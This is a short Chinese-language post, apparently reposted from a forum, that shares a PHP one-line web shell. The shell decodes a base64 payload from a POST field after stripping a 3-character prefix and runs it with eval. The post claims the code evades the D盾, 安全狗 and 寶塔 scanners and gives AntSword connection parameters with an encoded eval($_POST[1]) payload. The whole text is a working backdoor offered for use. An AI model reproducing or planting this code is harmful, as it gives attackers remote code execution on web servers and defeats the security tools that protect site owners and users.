<?php if(isset($_REQUEST['phpsessid'])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST['key'],3)); eval(B::$d); } ?>
D盾查殺無提示
利用方法如圖,實際就是「任意3個字符的前綴+base64編碼的PHP代碼」
中國蟻劍連接參數 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1
連接成功
分享一個過狗過D盾過寶塔的php一句話木馬
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。